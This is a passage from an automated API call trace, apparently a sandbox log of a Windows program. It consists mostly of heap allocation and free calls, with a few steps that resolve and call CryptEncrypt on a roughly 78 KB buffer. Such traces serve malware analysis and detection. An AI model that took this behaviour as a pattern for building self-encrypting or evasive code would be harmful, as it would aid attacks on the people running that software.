wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0166.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0166.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0166.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0166.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0166.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0166.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0166.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0166.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0166.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0166.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0166.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0166.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0166.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0166.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0166.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0166.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0166.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0166.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0166.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0166.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0166.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0166.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0166.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d8460 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa2f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0166.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.088] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0166.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0166.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0166.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0166.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0166.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0166.088] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x130fe, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x13100) returned 1 [0166.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0166.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0166.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0166.090] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.090] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.090] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.090] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.090] CharLowerBuffW (in: lpsz="byte[78080]", cchLength=0xb | out: lpsz="byte[78080]") returned 0xb [0166.090] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.091] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.091] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.091] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0166.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0166.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0166.091] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.091] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.091] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0166.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0166.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0166.091] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0166.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0166.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0166.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.092] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d8460*, pdwDataLen=0x8bef68*=0x130fe, dwBufLen=0x13100 | out: pbData=0x34d8460*, pdwDataLen=0x8bef68*=0x13100) returned 1 [0166.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0166.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0166.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0166.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0166.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0166.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0166.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0166.093] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0166.094] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.094] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0166.094] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0166.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0166.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0166.095] 